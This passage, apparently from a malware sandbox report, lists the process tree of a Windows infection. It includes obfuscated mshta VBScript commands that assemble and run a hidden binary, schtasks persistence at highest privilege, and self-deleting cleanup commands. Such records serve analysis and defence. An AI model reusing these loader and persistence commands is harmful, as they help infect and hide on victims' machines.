                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6d-64bc9-7de-3a482-4bae7af7e7052\Golemaecoshi.exe"
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:2904
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e0rrmw43.evs\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                      PID:7296
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e0rrmw43.evs\GcleanerEU.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\e0rrmw43.evs\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:9036
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txnq5x0n.unx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        PID:1160
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:7152
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\txnq5x0n.unx\installer.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\txnq5x0n.unx\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:9212
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tazpvhbb.mr4\any.exe & exit
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                            PID:4488
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tazpvhbb.mr4\any.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\tazpvhbb.mr4\any.exe
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:9220
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tazpvhbb.mr4\any.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tazpvhbb.mr4\any.exe" -u
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:6500
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwzbn4n4.0rx\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                  PID:8324
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\iwzbn4n4.0rx\gcleaner.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\iwzbn4n4.0rx\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:9520
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1sirfv2j.k2t\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:8456
                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\mhwj19Mgbc44vdYDfEzvDdeP.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\mhwj19Mgbc44vdYDfEzvDdeP.exe"
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:6728
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                              PID:5780
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:8048
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1c4,0x1c0,0x1ec,0x208,0x7ffb1a7bdec0,0x7ffb1a7bded0,0x7ffb1a7bdee0
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                      PID:7988
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x130,0x134,0x138,0x10c,0x13c,0x7ff695ab9e70,0x7ff695ab9e80,0x7ff695ab9e90
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                          PID:8896
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,9848757204461854311,10976859093295266497,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8048_1567641690" --mojo-platform-channel-handle=1808 /prefetch:8
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:1408
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1496,9848757204461854311,10976859093295266497,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8048_1567641690" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1516 /prefetch:2
                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                            PID:10048
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:5376
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:5424
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\zzGYoFAo0mgTiEMh9Hs1lYI5.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\zzGYoFAo0mgTiEMh9Hs1lYI5.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:6228
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\yyZhcFIgKlqzKekJuWQ03B2b.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\yyZhcFIgKlqzKekJuWQ03B2b.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:6248
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\bsLsvVrp6LihU3TCOo08WIFq.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\bsLsvVrp6LihU3TCOo08WIFq.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:6312
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\i1quH2olpUWgOEBAF3GG9r8G.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\i1quH2olpUWgOEBAF3GG9r8G.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:6196
                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:6892
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 492
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:5304
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\GRiqP46jqBlWa8hYH_ZVOb4c.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\GRiqP46jqBlWa8hYH_ZVOb4c.exe"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:6708
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\GP7ZO2GvPtb5YCO3Kwy3sgJU.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\GP7ZO2GvPtb5YCO3Kwy3sgJU.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:6944
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\DCJtKIQlnx72ETy1sEy3oOxk.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\DCJtKIQlnx72ETy1sEy3oOxk.exe"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:7164
                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\smpfSonZleC5nxTH_ENy9UDs.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\smpfSonZleC5nxTH_ENy9UDs.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:5376
                                                                                                                                                                                                                                                            • C:\ProgramData\build.exe
                                                                                                                                                                                                                                                              "C:\ProgramData\build.exe"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:7152
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\ProgramData\build.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:6276
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                      taskkill /im build.exe /f
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                      PID:6192
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                      PID:9200
                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\VVEJ2wasLm5xaloCmTKUO75_.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\VVEJ2wasLm5xaloCmTKUO75_.exe"
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:4664
                                                                                                                                                                                                                                                                  • C:\ProgramData\8614912.exe
                                                                                                                                                                                                                                                                    "C:\ProgramData\8614912.exe"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:6752
                                                                                                                                                                                                                                                                    • C:\ProgramData\5306087.exe
                                                                                                                                                                                                                                                                      "C:\ProgramData\5306087.exe"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:4904
                                                                                                                                                                                                                                                                    • C:\ProgramData\8538102.exe
                                                                                                                                                                                                                                                                      "C:\ProgramData\8538102.exe"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:7164
                                                                                                                                                                                                                                                                    • C:\ProgramData\5500938.exe
                                                                                                                                                                                                                                                                      "C:\ProgramData\5500938.exe"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:4676
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:6380
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\u7DRMjfUAlGEDHBko8Ww66qn.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                              PID:5604
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                                                                                8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                  PID:5248
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:5372
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                          PID:6820
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                          PID:5044
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                              PID:4744
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                  PID:5900
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                    PID:2820
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                    msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:6900
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                              taskkill -im "u7DRMjfUAlGEDHBko8Ww66qn.exe" -F
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                              PID:6260
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\vYZGTGa43ceOxeNWCCw8vDIV.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\vYZGTGa43ceOxeNWCCw8vDIV.exe"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QJ6EU.tmp\vYZGTGa43ceOxeNWCCw8vDIV.tmp
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QJ6EU.tmp\vYZGTGa43ceOxeNWCCw8vDIV.tmp" /SL5="$50248,506127,422400,C:\Users\Admin\Pictures\Adobe Films\vYZGTGa43ceOxeNWCCw8vDIV.exe"
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:3520
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-551AK.tmp\ShareFolder.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-551AK.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                              PID:7404
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\92-f3849-c9c-72ab3-9965374ee53aa\Pitaegukoti.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\92-f3849-c9c-72ab3-9965374ee53aa\Pitaegukoti.exe"
                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                  PID:1336
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g1534dlb.bxz\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:8596
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\g1534dlb.bxz\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\g1534dlb.bxz\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                          PID:8768
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40t12cnh.acw\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                        PID:3220
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\40t12cnh.acw\installer.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\40t12cnh.acw\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                            PID:2840
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qyikvoni.jbh\any.exe & exit
                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                            PID:9456
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\qyikvoni.jbh\any.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\qyikvoni.jbh\any.exe
                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                PID:9728
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\qyikvoni.jbh\any.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\qyikvoni.jbh\any.exe" -u
                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  PID:5652
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5m2imtwn.1mu\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:9712
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5m2imtwn.1mu\gcleaner.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5m2imtwn.1mu\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:10072
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bhysk2vj.wbu\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:9888
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\l84A1Zzw5GFjYlxOsBEiYHeM.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\l84A1Zzw5GFjYlxOsBEiYHeM.exe"
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          PID:496
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:512
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                                                                          Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                          PID:3240
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:1464
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                                                                                                                                            Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                            PID:2744
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
